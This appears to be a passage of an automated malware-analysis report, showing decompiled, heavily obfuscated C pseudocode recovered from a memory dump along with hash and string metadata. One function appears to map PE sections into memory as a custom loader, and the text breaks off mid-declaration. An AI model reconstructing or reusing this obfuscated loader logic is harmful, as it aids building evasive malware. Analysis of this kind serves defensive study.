                                          									_t367 = E006CBB3A(_v684, _v668, _t394, _v548, _v620,  &_v540, _v564);
                                          									_t450 =  &(_t450[7]);
                                          									if(_t367 != 0) {
                                          										E006D4F7D(_v552, _v580, _v540);
                                          										E006D4F7D(_v584, _v556, _v536);
                                          									}
                                          									_t435 = _v572;
                                          									_push(_v548);
                                          									_t401 = _v568;
                                          									L21:
                                          									E006D4F7D(_t401, _t435);
                                          									L22:
                                          									_t445 = 0x2e38c466;
                                          									while(1) {
                                          										L1:
                                          										_t354 = 0x2d3a08fe;
                                          										goto L2;
                                          									}
                                          								} else {
                                          									if(_t445 == 0xd57030c) {
                                          										return E006CF536(_v624, _v632, _v648, _t444);
                                          									}
                                          									if(_t445 == 0x1b7bc3fb) {
                                          										E006CF326();
                                          										E006CF6DF(_t394);
                                          										_t354 = 0x2d3a08fe;
                                          										_t445 = 0x1f6584a2;
                                          										_t383 =  !=  ? 0x2d3a08fe : 0x19ec5bc6;
                                          										goto L2;
                                          									} else {
                                          										if(_t445 == 0x1f6584a2) {
                                          											if(_t383 != _t354) {
                                          												_t445 = 0x1fb1d4b9;
                                          												continue;
                                          											} else {
                                          												_push(_v652);
                                          												_push(_t394);
                                          												_t287 =  &_v676; // 0xe3216c4d
                                          												E006C17AC(_v660,  &_v548,  *_t287, _t394);
                                          												_t450 =  &(_t450[5]);
                                          												asm("sbb esi, esi");
                                          												_t445 = (_t445 & 0x125ad1ad) + 0xd57030c;
                                          												while(1) {
                                          													L1:
                                          													_t354 = 0x2d3a08fe;
                                          													L2:
                                          													_t394 = 0x2432fb60;
                                          													goto L3;
                                          												}
                                          											}
                                          										} else {
                                          											if(_t445 != 0x1fb1d4b9) {
                                          												goto L31;
                                          											} else {
                                          												_push( &_v524);
                                          												_push(0x6dc910);
                                          												_t378 = E006C88E5(_t449, _v544);
                                          												_t354 = 0x2d3a08fe;
                                          												if(_t378 == 0) {
                                          													if(_t383 == 0x2d3a08fe) {
                                          														E006D4F7D(_v636, _v608, _v548);
                                          														_t354 = 0x2d3a08fe;
                                          													}
                                          													_t445 = 0xd57030c;
                                          													while(1) {
                                          														L2:
                                          														_t394 = 0x2432fb60;
                                          														goto L3;
                                          													}
                                          												} else {
                                          													_t394 = 0x2432fb60;
                                          													_t445 =  ==  ? 0x2432fb60 : 0x35df9137;
                                          													continue;
                                          												}
                                          											}
                                          										}
                                          									}
                                          								}
                                          								L24:
                                          								if(_t445 != 0x351028fa) {
                                          									if(_t445 != 0x35df9137) {
                                          										goto L31;
                                          									} else {
                                          										_push(_t394);
                                          										_push(_v680);
                                          										_push( &_v524);
                                          										_t312 =  &_v672; // 0x7066
                                          										_push( *_t312);
                                          										_push( &_v540);
                                          										_push(_v644);
                                          										_push(0);
                                          										_t362 = E006C568E(_v592, 0);
                                          										_t450 =  &(_t450[7]);
                                          										if(_t362 == 0) {
                                          											goto L22;
                                          										} else {
                                          											E006D4F7D(_v616, _v600, _v540);
                                          											_t435 = _v612;
                                          											_push(_v536);
                                          											_t401 = _v604;
                                          											goto L21;
                                          										}
                                          										goto L28;
                                          									}
                                          									L34:
                                          									return _t359;
                                          								}
                                          								L28:
                                          								_push(_t394);
                                          								_push(_t394);
                                          								_t395 = 0x38;
                                          								_t359 = E006C8736(_t395);
                                          								_t444 = _t359;
                                          								if(_t444 != 0) {
                                          									_t445 = 0x1b7bc3fb;
                                          									goto L1;
                                          								}
                                          								goto L34;
                                          							}
                                          							if(_t445 == 0x2e38c466) {
                                          								 *((intOrPtr*)(_t444 + 0x24)) = _t449;
                                          								_t445 = 0xbb47724;
                                          								_t355 =  *0x6dca24; // 0x0
                                          								 *((intOrPtr*)(_t444 + 0x2c)) = _t355;
                                          								_t354 = 0x2d3a08fe;
                                          								 *0x6dca24 = _t444;
                                          								goto L31;
                                          							}
                                          							goto L24;
                                          							L31:
                                          						} while (_t445 != 0xbb47724);
                                          						return _t354;
                                          					}
                                          				}
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: #$-$@C$G1$Ml!$]V$`H$b{$fpMl!$s5$}a$~\
                                          • API String ID: 0-964951681
                                          • Opcode ID: 80e30609485377edb98c6cdad092393e8a1b833d1d03bb6b0f7a8a4b471eb0c3
                                          • Instruction ID: 6736197d75a95e30fd5f9f3921f831166e1a21474c4f9fadbee197369afdbb6e
                                          • Opcode Fuzzy Hash: 80e30609485377edb98c6cdad092393e8a1b833d1d03bb6b0f7a8a4b471eb0c3
                                          • Instruction Fuzzy Hash: BE02617150D3818FE368CF25D54AA5BBBE2FBC4708F50891DF199862A0DBB58909CF53
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 98%
                                          			E006CE377() {
                                          				intOrPtr _t319;
                                          				intOrPtr _t322;
                                          				void* _t325;
                                          				intOrPtr _t326;
                                          				intOrPtr _t327;
                                          				intOrPtr _t329;
                                          				void* _t336;
                                          				intOrPtr* _t368;
                                          				signed int _t371;
                                          				signed int _t372;
                                          				signed int _t373;
                                          				void* _t374;
                                          				intOrPtr* _t376;
                                          				void* _t380;
                                          
                                          				 *(_t380 + 0x90) = 0x492ac5;
                                          				 *(_t380 + 0x94) = 0;
                                          				 *((intOrPtr*)(_t380 + 0x98)) = 0;
                                          				_t336 = 0x262df760;
                                          				 *(_t380 + 0x48) = 0xf735;
                                          				 *(_t380 + 0x48) =  *(_t380 + 0x48) << 2;
                                          				 *(_t380 + 0x48) =  *(_t380 + 0x48) | 0x892d06ba;
                                          				 *(_t380 + 0x48) =  *(_t380 + 0x48) ^ 0x892fdeff;
                                          				 *(_t380 + 4) = 0x4aa3;
                                          				 *(_t380 + 4) =  *(_t380 + 4) >> 0xc;
                                          				 *(_t380 + 4) =  *(_t380 + 4) | 0x950899f8;
                                          				 *(_t380 + 4) =  *(_t380 + 4) << 4;
                                          				 *(_t380 + 4) =  *(_t380 + 4) ^ 0x50899fc1;
                                          				 *(_t380 + 0x34) = 0x5ec9;
                                          				 *(_t380 + 0x8c) = 0;
                                          				 *(_t380 + 0x44) =  *(_t380 + 0x34) * 0x1a;
                                          				_t371 = 0x70;
                                          				 *(_t380 + 0x48) =  *(_t380 + 0x44) * 0x3f;
                                          				 *(_t380 + 0x48) =  *(_t380 + 0x48) ^ 0x025e429c;
                                          				 *(_t380 + 0x60) = 0xe88e;
                                          				 *(_t380 + 0x60) =  *(_t380 + 0x60) >> 5;
                                          				 *(_t380 + 0x60) =  *(_t380 + 0x60) + 0xffff58a0;
                                          				 *(_t380 + 0x60) =  *(_t380 + 0x60) ^ 0xffff02fa;
                                          				 *(_t380 + 0x58) = 0xbd5e;
                                          				 *(_t380 + 0x58) =  *(_t380 + 0x58) ^ 0xb084e46b;
                                          				 *(_t380 + 0x58) =  *(_t380 + 0x58) >> 0xe;
                                          				 *(_t380 + 0x58) =  *(_t380 + 0x58) ^ 0x0002e87c;
                                          				 *(_t380 + 0x2c) = 0x606e;
                                          				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0xffff1c2d;
                                          				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0x108d;
                                          				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) * 0x15;
                                          				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) ^ 0xfff6a15c;
                                          				 *(_t380 + 0x4c) = 0xb86a;
                                          				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) + 0xd5ca;
                                          				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) | 0x7ce26820;
                                          				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x7ce3b1fe;
                                          				 *(_t380 + 0x44) = 0x5cf7;
                                          				 *(_t380 + 0x44) =  *(_t380 + 0x44) | 0x38977032;
                                          				 *(_t380 + 0x44) =  *(_t380 + 0x44) * 0x30;
                                          				 *(_t380 + 0x44) =  *(_t380 + 0x44) ^ 0x9c67384b;
                                          				 *(_t380 + 0x74) = 0xd45b;
                                          				 *(_t380 + 0x74) =  *(_t380 + 0x74) / _t371;
                                          				 *(_t380 + 0x74) =  *(_t380 + 0x74) ^ 0x00004dc6;
                                          				 *(_t380 + 0x14) = 0x87c2;
                                          				 *(_t380 + 0x14) =  *(_t380 + 0x14) + 0xc44a;
                                          				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x3473056e;
                                          				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x529657aa;
                                          				 *(_t380 + 0x14) =  *(_t380 + 0x14) ^ 0x66e43592;
                                          				 *(_t380 + 0x6c) = 0x3ddc;
                                          				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) >> 6;
                                          				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) ^ 0x00003a4d;
                                          				 *(_t380 + 0x3c) = 0xc186;
                                          				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) + 0xffff2874;
                                          				_t372 = 0x60;
                                          				 *(_t380 + 0x38) =  *(_t380 + 0x3c) / _t372;
                                          				 *(_t380 + 0x38) =  *(_t380 + 0x38) ^ 0x02aacd93;
                                          				 *(_t380 + 0x94) = 0x420b;
                                          				 *(_t380 + 0x94) =  *(_t380 + 0x94) + 0xffff81cc;
                                          				 *(_t380 + 0x94) =  *(_t380 + 0x94) ^ 0xffffbf2e;
                                          				 *(_t380 + 0x24) = 0x5d05;
                                          				 *(_t380 + 0x24) =  *(_t380 + 0x24) << 7;
                                          				 *(_t380 + 0x24) =  *(_t380 + 0x24) >> 0xf;
                                          				 *(_t380 + 0x24) =  *(_t380 + 0x24) ^ 0x53344f8a;
                                          				 *(_t380 + 0x24) =  *(_t380 + 0x24) ^ 0x53345d77;
                                          				 *(_t380 + 0x78) = 0xceba;
                                          				 *(_t380 + 0x78) =  *(_t380 + 0x78) >> 0x10;
                                          				 *(_t380 + 0x78) =  *(_t380 + 0x78) ^ 0x00002af4;
                                          				 *(_t380 + 0x1c) = 0x6278;
                                          				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) << 0xa;
                                          				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) ^ 0x09bc8c53;
                                          				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) + 0xd5e;
                                          				 *(_t380 + 0x1c) =  *(_t380 + 0x1c) ^ 0x08353d86;
                                          				 *(_t380 + 0x18) = 0x457c;
                                          				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x1123efff;
                                          				 *(_t380 + 0x18) =  *(_t380 + 0x18) + 0x9050;
                                          				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x715c45c2;
                                          				 *(_t380 + 0x18) =  *(_t380 + 0x18) ^ 0x607832f2;
                                          				 *(_t380 + 0x4c) = 0x48c4;
                                          				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) + 0x892d;
                                          				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x18e86949;
                                          				 *(_t380 + 0x4c) =  *(_t380 + 0x4c) ^ 0x18e8d95b;
                                          				 *(_t380 + 0x64) = 0xb936;
                                          				 *(_t380 + 0x64) =  *(_t380 + 0x64) + 0xd883;
                                          				 *(_t380 + 0x64) =  *(_t380 + 0x64) ^ 0x0001ac1b;
                                          				 *(_t380 + 0x20) = 0xcbd2;
                                          				_t373 = 0x7c;
                                          				 *(_t380 + 0x20) =  *(_t380 + 0x20) * 0x1d;
                                          				 *(_t380 + 0x20) =  *(_t380 + 0x20) / _t373;
                                          				 *(_t380 + 0x20) =  *(_t380 + 0x20) | 0xfc977955;
                                          				 *(_t380 + 0x20) =  *(_t380 + 0x20) ^ 0xfc977dd0;
                                          				 *(_t380 + 0x6c) = 0x94d3;
                                          				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) | 0xdadf67d0;
                                          				 *(_t380 + 0x6c) =  *(_t380 + 0x6c) ^ 0xdadfc8fb;
                                          				 *(_t380 + 0x90) = 0xca42;
                                          				 *(_t380 + 0x90) =  *(_t380 + 0x90) * 0x44;
                                          				 *(_t380 + 0x90) =  *(_t380 + 0x90) ^ 0x0035a538;
                                          				 *(_t380 + 0x3c) = 0x3a85;
                                          				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) | 0x6827828e;
                                          				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) >> 5;
                                          				 *(_t380 + 0x3c) =  *(_t380 + 0x3c) ^ 0x0341637e;
                                          				 *(_t380 + 0x74) = 0xaf39;
                                          				 *(_t380 + 0x74) =  *(_t380 + 0x74) << 0xb;
                                          				 *(_t380 + 0x74) =  *(_t380 + 0x74) ^ 0x0579f034;
                                          				 *(_t380 + 0x84) = 0x7bfe;
                                          				 *(_t380 + 0x84) =  *(_t380 + 0x84) * 0x70;
                                          				 *(_t380 + 0x84) =  *(_t380 + 0x84) ^ 0x0036086b;
                                          				 *(_t380 + 0x88) = 0xbca6;
                                          				 *(_t380 + 0x88) =  *(_t380 + 0x88) + 0xffffd080;
                                          				 *(_t380 + 0x88) =  *(_t380 + 0x88) ^ 0x0000ec3f;
                                          				 *(_t380 + 0x7c) = 0x7bcd;
                                          				 *(_t380 + 0x7c) =  *(_t380 + 0x7c) >> 0xf;
                                          				 *(_t380 + 0x7c) =  *(_t380 + 0x7c) ^ 0x00003bde;
                                          				 *(_t380 + 0x8c) = 0x5f89;
                                          				 *(_t380 + 0x8c) =  *(_t380 + 0x8c) + 0x6fee;
                                          				 *(_t380 + 0x8c) =  *(_t380 + 0x8c) ^ 0x0000a333;
                                          				 *(_t380 + 0x2c) = 0x86b9;
                                          				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) + 0xffffbf3c;
                                          				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) >> 5;
                                          				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) >> 4;
                                          				 *(_t380 + 0x2c) =  *(_t380 + 0x2c) ^ 0x000073b3;
                                          				 *(_t380 + 0x50) = 0x2126;
                                          				 *(_t380 + 0x50) =  *(_t380 + 0x50) ^ 0x2e94f228;
                                          				 *(_t380 + 0x50) =  *(_t380 + 0x50) >> 0xe;
                                          				 *(_t380 + 0x50) =  *(_t380 + 0x50) ^ 0x00008d73;
                                          				 *(_t380 + 0x80) = 0xf6ec;
                                          				 *(_t380 + 0x80) =  *(_t380 + 0x80) * 0x34;
                                          				 *(_t380 + 0x80) =  *(_t380 + 0x80) ^ 0x003277fb;
                                          				 *(_t380 + 0x60) = 0x3ac6;
                                          				 *(_t380 + 0x60) =  *(_t380 + 0x60) * 0x28;
                                          				 *(_t380 + 0x60) =  *(_t380 + 0x60) | 0xd79c8d1c;
                                          				 *(_t380 + 0x60) =  *(_t380 + 0x60) ^ 0xd79df08f;
                                          				 *(_t380 + 0x30) = 0x4848;
                                          				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x9b476349;
                                          				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x919ac53c;
                                          				 *(_t380 + 0x30) =  *(_t380 + 0x30) ^ 0x0adda027;
                                          				 *(_t380 + 0x34) = 0xf09c;
                                          				 *(_t380 + 0x34) =  *(_t380 + 0x34) << 0xc;
                                          				_t374 = 0x28650a76;
                                          				_t368 =  *((intOrPtr*)(_t380 + 0x98));
                                          				_t334 =  *((intOrPtr*)(_t380 + 0x98));
                                          				_t378 =  *((intOrPtr*)(_t380 + 0x98));
                                          				 *(_t380 + 0x34) =  *(_t380 + 0x34) * 0x3e;
                                          				 *(_t380 + 0x34) =  *(_t380 + 0x34) ^ 0xa45c8003;
                                          				while(_t336 != 0xd3df7e1) {
                                          					if(_t336 == 0x132cc48f) {
                                          						E006CF536( *(_t380 + 0x34),  *(_t380 + 0x58),  *(_t380 + 0x84), _t368);
                                          						_t336 = 0xd3df7e1;
                                          						continue;
                                          					}
                                          					if(_t336 == 0x159b7bb7) {
                                          						_push(_t336);
                                          						_push(_t336);
                                          						 *((intOrPtr*)(_t380 + 0xa0)) = 0x1000;
                                          						_t368 = E006C8736(0x1000);
                                          						__eflags = _t368;
                                          						_t336 =  !=  ? _t374 : 0xd3df7e1;
                                          						continue;
                                          					}
                                          					if(_t336 == 0x18c2a499) {
                                          						_t319 = E006CB566(_t336,  *(_t380 + 0x44) | 0x00000006,  *(_t380 + 0x74),  *((intOrPtr*)(_t380 + 0x68)), 1,  *(_t380 + 0x90), _t336,  *((intOrPtr*)(_t380 + 0x28)),  *(_t380 + 0x7c), 0x2000000,  *(_t380 + 0x44),  *((intOrPtr*)(_t380 + 0x9c)),  *(_t380 + 0x38), _t380 + 0xb0);
                                          						_t334 = _t319;
                                          						_t380 = _t380 + 0x30;
                                          						__eflags = _t319 - 0xffffffff;
                                          						if(__eflags == 0) {
                                          							L29:
                                          							__eflags = 0;
                                          							return 0;
                                          						}
                                          						_t336 = 0x159b7bb7;
                                          						continue;
                                          					}
                                          					if(_t336 == 0x1a0fbde3) {
                                          						E006D3E3F(_t336, _t380 + 0xb4, __eflags,  *(_t380 + 0x48),  *((intOrPtr*)(_t380 + 0x5c)));
                                          						_t322 = E006C28CE(_t380 + 0xbc,  *(_t380 + 0x60),  *(_t380 + 0x30));
                                          						_t378 = _t322;
                                          						_t380 = _t380 + 0xc;
                                          						_t336 = 0x18c2a499;
                                          						 *((short*)(_t322 - 2)) = 0;
                                          						continue;
                                          					}
                                          					if(_t336 == 0x262df760) {
                                          						_t336 = 0x1a0fbde3;
                                          						continue;
                                          					}
                                          					if(_t336 != _t374) {
                                          						L28:
                                          						__eflags = _t336 - 0x1c26cb40;
                                          						if(__eflags != 0) {
                                          							continue;
                                          						}
                                          						goto L29;
                                          					}
                                          					_t325 = E006D6319( *(_t380 + 0x44), _t334,  *((intOrPtr*)(_t380 + 0xc4)),  *(_t380 + 0x74),  *(_t380 + 0x7c),  *(_t380 + 0x84), _t368,  *(_t380 + 0x38), _t336,  *(_t380 + 0x7c), _t336, _t336,  *(_t380 + 0x94), _t380 + 0xac);
                                          					_t380 = _t380 + 0x30;
                                          					if(_t325 == 0) {
                                          						_t326 =  *((intOrPtr*)(_t380 + 0x9c));
                                          						L18:
                                          						__eflags = _t326;
                                          						if(__eflags == 0) {
                                          							_t336 = _t374;
                                          						} else {
                                          							_t327 =  *0x6dca30; // 0x0
                                          							E006D8A4B( *(_t380 + 0x90),  *(_t380 + 0x94),  *(_t380 + 0x84),  *((intOrPtr*)(_t327 + 8)),  *(_t380 + 0x8c));
                                          							_t380 = _t380 + 0xc;
                                          							_t336 = 0x132cc48f;
                                          						}
                                          						continue;
                                          					}
                                          					_t376 = _t368;
                                          					while( *((intOrPtr*)(_t376 + 4)) != 4 || E006C8624( *(_t380 + 0x44), _t378,  *(_t380 + 0x78), _t376 + 0xc) != 0) {
                                          						_t329 =  *_t376;
                                          						if(_t329 == 0) {
                                          							_t326 =  *((intOrPtr*)(_t380 + 0x9c));
                                          							L17:
                                          							_t374 = 0x28650a76;
                                          							goto L18;
                                          						}
                                          						_t376 = _t376 + _t329;
                                          					}
                                          					_t326 = 1;
                                          					 *((intOrPtr*)(_t380 + 0x9c)) = 1;
                                          					goto L17;
                                          				}
                                          				E006D4F7D( *(_t380 + 0x60),  *(_t380 + 0x30), _t334);
                                          				_t336 = 0x1c26cb40;
                                          				goto L28;
                                          			}


















                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: h|$&!$?$HH$M:$^$n`$ve($ve($w]4S$|E$o
                                          • API String ID: 823142352-1348462970
                                          • Opcode ID: 3a3956d77012e58235b0cdf28eae770eee416c30ee9d3110ab00cfb97c865c0c
                                          • Instruction ID: 07f34188b7ff56c8ea6c4b622394870881ae40441205578570248896f52f5c2b
                                          • Opcode Fuzzy Hash: 3a3956d77012e58235b0cdf28eae770eee416c30ee9d3110ab00cfb97c865c0c
                                          • Instruction Fuzzy Hash: 73F104715093819FE368CF25C54AA6BBBF2FBC5708F10891DE1DA862A0D7B58909CF17
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
                                          			E006D6DB9(void* __ecx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                          				signed int _v4;
                                          				intOrPtr _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				signed int _v64;
                                          				signed int _v68;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				signed int _v80;
                                          				signed int _v84;
                                          				signed int _v88;
                                          				signed int _v92;
                                          				signed int _v96;
                                          				signed int _v100;
                                          				signed int _v104;
                                          				void* _t224;
                                          				void* _t243;
                                          				void* _t256;
                                          				void* _t264;
                                          				void* _t288;
                                          				signed int _t290;
                                          				signed int _t291;
                                          				signed int _t292;
                                          				signed int _t293;
                                          				signed int _t294;
                                          				void* _t295;
                                          				void* _t298;
                                          				signed int* _t301;
                                          				signed int* _t302;
                                          				signed int* _t303;
                                          
                                          				_push(_a20);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(0);
                                          				_push(3);
                                          				_push(__ecx);
                                          				E006C602B(_t224);
                                          				_v4 = _v4 & 0x00000000;
                                          				_v8 = 0x15bbba;
                                          				_v72 = 0x7e44;
                                          				_t290 = 0x3e;
                                          				_v72 = _v72 * 0x56;
                                          				_v72 = _v72 | 0xe97810d5;
                                          				_v72 = _v72 ^ 0xe97a6add;
                                          				_v56 = 0x50ea;
                                          				_v56 = _v56 >> 9;
                                          				_v56 = _v56 >> 8;
                                          				_v56 = _v56 ^ 0x00008000;
                                          				_v100 = 0x7422;
                                          				_v100 = _v100 + 0xffff8791;
                                          				_v100 = _v100 ^ 0x724a15f0;
                                          				_v100 = _v100 + 0xd05;
                                          				_v100 = _v100 ^ 0x8db5db48;
                                          				_v48 = 0x2edd;
                                          				_v48 = _v48 / _t290;
                                          				_v48 = _v48 ^ 0x00005532;
                                          				_v76 = 0xee3f;
                                          				_v76 = _v76 + 0xffffe6cd;
                                          				_v76 = _v76 + 0xffff5ce1;
                                          				_v76 = _v76 ^ 0x00006965;
                                          				_v104 = 0xa36d;
                                          				_v104 = _v104 << 0xc;
                                          				_v104 = _v104 + 0x5d19;
                                          				_v104 = _v104 >> 1;
                                          				_v104 = _v104 ^ 0x051bebf0;
                                          				_v52 = 0xa852;
                                          				_v52 = _v52 + 0xddb7;
                                          				_v52 = _v52 ^ 0x00019bba;
                                          				_v96 = 0xa4e6;
                                          				_v96 = _v96 | 0xa6d42a45;
                                          				_t291 = 0x2e;
                                          				_v96 = _v96 * 0x22;
                                          				_v96 = _v96 << 1;
                                          				_v96 = _v96 ^ 0x507e3c16;
                                          				_v40 = 0x2ce2;
                                          				_v40 = _v40 + 0xffffe435;
                                          				_v40 = _v40 ^ 0x00002c9b;
                                          				_v64 = 0xad5e;
                                          				_v64 = _v64 * 0xd;
                                          				_v64 = _v64 >> 0xf;
                                          				_v64 = _v64 ^ 0x00006dfc;
                                          				_v68 = 0x15e2;
                                          				_v68 = _v68 << 4;
                                          				_v68 = _v68 + 0x971e;
                                          				_v68 = _v68 ^ 0x0001ffd3;
                                          				_v28 = 0x5912;
                                          				_v28 = _v28 | 0xb77a8e9e;
                                          				_v28 = _v28 ^ 0xb77a927a;
                                          				_v32 = 0xb0a1;
                                          				_v32 = _v32 >> 6;
                                          				_v32 = _v32 ^ 0x000014c1;
                                          				_v36 = 0x1527;
                                          				_v36 = _v36 / _t291;
                                          				_v36 = _v36 ^ 0x000058cb;
                                          				_v92 = 0x32e5;
                                          				_v92 = _v92 * 0x31;
                                          				_v92 = _v92 + 0xffff00ec;
                                          				_v92 = _v92 << 8;
                                          				_v92 = _v92 ^ 0x08be8a0d;
                                          				_v20 = 0xbd6f;
                                          				_v20 = _v20 + 0xab45;
                                          				_v20 = _v20 ^ 0x000148c7;
                                          				_v24 = 0x6d6f;
                                          				_t292 = 0x6d;
                                          				_v24 = _v24 / _t292;
                                          				_v24 = _v24 ^ 0x00002132;
                                          				_v84 = 0xac46;
                                          				_t293 = 0x2f;
                                          				_v84 = _v84 * 0x6c;
                                          				_v84 = _v84 + 0xe89f;
                                          				_v84 = _v84 >> 7;
                                          				_v84 = _v84 ^ 0x0000aacf;
                                          				_v88 = 0x7aeb;
                                          				_v88 = _v88 * 0x1d;
                                          				_v88 = _v88 >> 0xb;
                                          				_t294 = 0x7f;
                                          				_v88 = _v88 / _t293;
                                          				_v88 = _v88 ^ 0x00001cd5;
                                          				_v60 = 0x8b82;
                                          				_v60 = _v60 + 0xffffb5bd;
                                          				_v60 = _v60 * 0x35;
                                          				_v60 = _v60 ^ 0x000df53e;
                                          				_v12 = 0x733f;
                                          				_v12 = _v12 >> 3;
                                          				_v12 = _v12 ^ 0x000065d0;
                                          				_v16 = 0x6f84;
                                          				_v16 = _v16 | 0x29e4272c;
                                          				_v16 = _v16 ^ 0x29e452e1;
                                          				_v80 = 0x4249;
                                          				_v80 = _v80 >> 0xb;
                                          				_v80 = _v80 / _t294;
                                          				_v80 = _v80 >> 3;
                                          				_v80 = _v80 ^ 0x00004a04;
                                          				_v44 = 0x4ba5;
                                          				_v44 = _v44 + 0xffffabaf;
                                          				_v44 = _v44 ^ 0xfffff714;
                                          				_t243 = E006D3811(__ecx, _v48, _a8, _v76, _v104, _v52);
                                          				_t256 = _t243;
                                          				_t301 =  &(( &_v104)[0xb]);
                                          				if(_t256 == 0) {
                                          					return _t243;
                                          				}
                                          				_t295 = E006C7EC5(_v96, _v40,  *((intOrPtr*)(_t256 + 0x50)), _v64, _v68, _v44, __ecx, _v100 | _v72);
                                          				_t302 =  &(_t301[6]);
                                          				if(_t295 == 0) {
                                          					L7:
                                          					return _t295;
                                          				}
                                          				E006D2674(_v28, _v32,  *((intOrPtr*)(_t256 + 0x54)), _t295, _v36, _v92, _a8);
                                          				_t303 =  &(_t302[5]);
                                          				_t288 = ( *(_t256 + 0x14) & 0x0000ffff) + 0x18 + _t256;
                                          				_t298 = ( *(_t256 + 6) & 0x0000ffff) * 0x28 + _t288;
                                          				while(_t288 < _t298) {
                                          					_t261 =  <  ?  *((void*)(_t288 + 8)) :  *((intOrPtr*)(_t288 + 0x10));
                                          					E006D2674(_v20, _v24,  <  ?  *((void*)(_t288 + 8)) :  *((intOrPtr*)(_t288 + 0x10)),  *((intOrPtr*)(_t288 + 0xc)) + _t295, _v84, _v88,  *((intOrPtr*)(_t288 + 0x14)) + _a8);
                                          					_t303 =  &(_t303[5]);
                                          					_t288 = _t288 + 0x28;
                                          				}
                                          				E006CF7D8(_t295, _t256);
                                          				_t264 = _t295;
                                          				if(E006CE05A(_t264, _t256) == 0) {
                                          					_push(_t264);
                                          					E006D4FE8(_v56, _t295, _v60, _v12, _v16, _v80);
                                          					_t295 = 0;
                                          				}
                                          				goto L7;
                                          			}













































                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: "t$2!$2U$?s$IB$ei$om$,$2$P$R)$z
                                          • API String ID: 0-3377435326
                                          • Opcode ID: 3d0207934d40abbc6c7b225edab598dbb3739286f739d077276c6eaf293611b6
                                          • Instruction ID: 650ce94bc2e34677ef0a57f6795daaa0c1465be0433a2a5aacc856e69c737990
                                          • Opcode Fuzzy Hash: 3d0207934d40abbc6c7b225edab598dbb3739286f739d077276c6eaf293611b6
                                          • Instruction Fuzzy Hash: 0DB112719087809FE364CF25C88A94BFBF2BBC4358F508A1DF695862A0D7B9C559CF42
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 96%
                                          			E006C6D9F() {
                                          				char _v520;
                                          				char _v1040;
                                          				signed int _v1044;
                                          				intOrPtr _v1048;
                                          				char _v1052;
                                          				signed int _v1056;
                                          				signed int _v1060;
                                          				signed int _v1064;
                                          				signed int _v1068;
                                          				signed int _v1072;
                                          				signed int _v1076;
                                          				signed int _v1080;
                                          				signed int _v1084;
                                          				signed int _v1088;
                                          				signed int _v1092;
                                          				signed int _v1096;
                                          				signed int _v1100;
                                          				signed int _v1104;
                                          				signed int _v1108;
                                          				signed int _v1112;
                                          				signed int _v1116;
                                          				signed int _v1120;
                                          				signed int _v1124;
                                          				signed int _v1128;
                                          				signed int _v1132;
                                          				signed int _v1136;
                                          				signed int _v1140;
                                          				signed int _v1144;
                                          				signed int _v1148;
                                          				signed int _v1152;
                                          				signed int _v1156;
                                          				signed int _v1160;
                                          				signed int _v1164;
                                          				signed int _v1168;
                                          				signed int _v1172;
                                          				signed int _v1176;
                                          				signed int _v1180;
                                          				signed int _v1184;
                                          				signed int _v1188;
                                          				signed int _v1192;
                                          				signed int _v1196;
                                          				signed int _v1200;
